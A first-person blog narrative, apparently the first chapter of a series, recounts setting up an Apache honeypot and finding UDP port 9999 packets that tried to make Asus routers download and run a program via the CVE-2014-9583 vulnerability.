This all started because I was bored and looking for something to do. Really.
One weekend in June I set up a honeypot, simply a Ubuntu Linux system running Apache and running full packet capture with tcpdump. I was expecting to capture Shellshock exploitation against the web server. So one of the first things I did was to look for the string wget, that would indicate a hacker was attempting to break into a computer–my decoy honeypot, and was instructing it to download a larger, more complex program. I found wget all right, but not in the place I expected.
This network packet started everything. A packet to UDP port 9999 with an embedded shell script, instructing the computer to use wget to download a file, and run it. It is not appropriate for one computer on the Internet to tell another computer what to do, sending a command out of nowhere. There is no authentication. So right away, I knew I had something “bad”. But what?
It was clear, from the presence of the
rm and other clues the target of the command was a Unix system. I soon discovered that some Asus routers, like the routers used in homes and small offices, listened on UDP port 9999. These routers often run a version of the Linux operating system. And, there was a vulnerability and an exploit, documented by Friedrich Postelstorfer and Joshua “jduck” Drake. The vulnerability had industry number CVE-2014-9583 and could let an unauthorized person take over an unpatched Asus router.
So, one IP address attempts to break into another system on the Internet, first using a backdoor into Linksys hardware, then a few minutes later using a backdoor into Asus hardware. Some searching did not find public discussion of this tactic.
At this point I was thrilled and was eager to chase this threat. The instruction in the Asus exploit directed the would-be victim to download another program and run it. I tried to download the program in the same way, but the downloads were never successful. As I continued to capture exploitation attempts from multiple IP addresses around the world, I knew I would have to get smarter.
To be continued in chapter 2…